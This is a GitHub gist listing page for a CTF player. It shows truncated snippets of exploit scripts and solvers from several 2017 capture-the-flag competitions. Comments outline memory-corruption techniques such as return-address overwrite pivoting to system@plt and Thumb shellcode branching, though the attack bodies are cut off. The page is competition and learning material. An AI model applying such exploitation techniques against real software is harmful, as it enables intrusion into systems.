Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View bkth's full-sized avatar

Bruno Keith bkth

231 followers · 3 following
View GitHub Profile
@bkth
bkth / skybot_exploit.py
Last active March 26, 2017 22:27
exploit script for skybot (insomnihack ctf 2017)
#!/usr/bin/python
from pwn import *
import time
def recv_menu():
return s.recvuntil('>>> ')
@bkth
bkth / decode.py
Created July 9, 2017 09:10
kompreplicants tower of hanoi
# the encoding is
# first four bits are the depth in the tree encoded
# next 8 bits is the character encoded
# next X bits is the position in the tree encoded with the depth given by the first four bits
# The file has the following structure
# Each tree node encoded + 4 bits set to zero + each original character encoded by its position in the tree + few bits at the end
bits = []
@bkth
bkth / rhme3exploit.py
Created September 1, 2017 23:05
rhme3 exploit chall
import time
import telnetlib
import sys
import binascii
import struct
import socket
HOST = "127.0.0.1" if len(sys.argv) < 2 else sys.argv[1]
PORT = 1337 if len(sys.argv) < 2 else int(sys.argv[2])
TARGET = (HOST, PORT)
@bkth
bkth / ascii_art.py
Last active September 4, 2017 15:58
TW17 CTF
import time
import telnetlib
import sys
import binascii
import struct
import socket
# OOB access inside the ascii art table with \x7f letting us access the first 6 qwords of our input
# overwrite return address on stack to make ESP point to our buffer which jumps to system@plt with the stack setup
@bkth
bkth / sniper.py
Created September 21, 2017 00:14
pointers sniper
import time
import telnetlib
import sys
import binascii
import struct
import socket
def info(s):
print "[*] %s" % s
@bkth
bkth / doit.py
Last active October 3, 2017 21:11
securimag's new year challenge, oversight from the author the git repo was publicly exposed so dirty script to rebuild the trees and get the sources
import os
import subprocess
def run_cmd(s):
return subprocess.check_output(s.split())
@bkth
bkth / keybase.md
Created October 7, 2017 18:22
keybase.md

Keybase proof

I hereby claim:

  • I am bkth on github.
  • I am bkth (https://keybase.io/bkth) on keybase.
  • I have a public key ASBZHtze7NMvZErOr3XCmUGi5x41XbrfafPY4bJ7fVsfgAo

To claim this, I am signing this object:

@bkth
bkth / sakura.py
Created November 6, 2017 04:49
HITCON CTF 2017
from z3 import *
f = open("source.c", "rb")
lines = f.read().split("\n")
input_byte = []
@bkth
bkth / calculator_exploit.py
Last active November 11, 2017 12:42
exploit for bin 300 HITB AMS (calculator)
#!/usr/bin/python
# Exploit for the BIN 300 (calculator) challenge during HITB AMS CTF
# We control 4 bytes every 8 bytes
# As Thumb instructions are 2 bytes we can make the processor switch instruction set and use a shellcode
# that does one instruction and a short branch to skip the next dword
from unicorn import *
from unicorn.arm_const import *
from keystone import *
@bkth
bkth / grumpcheck.py
Created September 17, 2017 20:03
CSAW_2017_CTF (prophecy, grumpcheck, pilot, scv)
# the check function is originally written in python and was fed through grumpy which is python to Go transpiler written by Google (open sourced on github)
# the main check function is 2k+~ lines but grumpy code has the somewhat general following pattern:
# grumpy_Op()
# if error:
# multi line of crap and bailout
# good path
# so we can go faster through it
# it checks for our input first to contain 5 part when split('-') is called
# then each part is checked to be 5 characters
# then it does some basic checking on the parts which are outlined below